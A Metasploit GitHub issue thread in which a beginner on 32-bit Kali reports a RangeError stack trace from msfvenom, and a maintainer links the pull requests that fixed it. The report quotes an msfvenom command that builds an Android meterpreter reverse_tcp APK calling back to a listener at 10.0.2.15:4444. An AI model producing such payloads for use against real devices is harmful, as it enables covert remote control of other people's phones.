### ISSUE TITLE
bignum too big to convert into 'long' (RangeError)

### ISSUE THREAD

**Issue by greenhornet4971** [rapid7/metasploit-framework#11067]
Kali Linux Metasploit MSFVENOM issue.

newbie here...

Terminal: msfvenom –p android/meterpreter/reverse_tcp LHOST=10.0.2.15 LPORT=4444 R > /root/Desktop/123.apk

wrote this.

This came,

/usr/share/metasploit-framework/lib/msf/core/payload/dalvik.rb:72:in `not_after=': bignum too big to convert into `long' (RangeError)
	from /usr/share/metasploit-framework/lib/msf/core/payload/dalvik.rb:72:in `generate_cert'
	from /usr/share/metasploit-framework/modules/payloads/stagers/android/reverse_https.rb:64:in `generate_jar'
	from /usr/share/metasploit-framework/lib/msf/core/payload/dalvik.rb:27:in `generate'
	from /usr/share/metasploit-framework/lib/msf/core/payload.rb:200:in `size'
	from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:158:in `block (2 levels) in recalculate'
	from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:102:in `each_pair'
	from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:102:in `block in recalculate'
	from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:98:in `each_pair'
	from /usr/share/metasploit-framework/lib/msf/core/payload_set.rb:98:in `recalculate'
	from /usr/share/metasploit-framework/lib/msf/core/modules/loader/base.rb:250:in `block in load_modules'
	from /usr/share/metasploit-framework/lib/msf/core/modules/loader/base.rb:247:in `each'
	from /usr/share/metasploit-framework/lib/msf/core/modules/loader/base.rb:247:in `load_modules'
	from /usr/share/metasploit-framework/lib/msf/core/module_manager/loading.rb:117:in `block in load_modules'
	from /usr/share/metasploit-framework/lib/msf/core/module_manager/loading.rb:115:in `each'
	from /usr/share/metasploit-framework/lib/msf/core/module_manager/loading.rb:115:in `load_modules'
	from /usr/share/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:41:in `block in add_module_path'
	from /usr/share/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:40:in `each'
	from /usr/share/metasploit-framework/lib/msf/core/module_manager/module_paths.rb:40:in `add_module_path'
	from /usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:50:in `block in init_module_paths'
	from /usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:49:in `each'
	from /usr/share/metasploit-framework/lib/msf/base/simple/framework/module_paths.rb:49:in `init_module_paths'
	from /usr/share/metasploit-framework/lib/msf/base/simple/framework.rb:121:in `simplify'
	from /usr/share/metasploit-framework/lib/msf/base/simple/framework.rb:73:in `create'
	from /usr/bin/msfvenom:39:in `init_framework'
	from /usr/bin/msfvenom:48:in `framework'
	from /usr/bin/msfvenom:334:in `<main>'

I do not know what to do now.

even wrote msfconsole in terminal but got the same error.

installed kali today on vmbox. kali 32 bit.

inbuilt os is win10.

working on kali.

**Comment by greenhornet4971** [comment]
Thanks.
Fortunately I've uninstalled metasploit and reinstalled it. Works like charm. ::°::

For anyone facing the same issue the solution is: Google how to uninstall metasploit in terminal & after that reinstall it.(metasploit installation in linux is also relevant with kali)
Good luck. (:

**Comment by busterb** [comment]
This was originally fixed here: https://github.com/rapid7/metasploit-framework/pull/2343
then re-fixed here: https://github.com/rapid7/metasploit-framework/pull/9653

The best solution is to stop using 32-bit operating systems :)
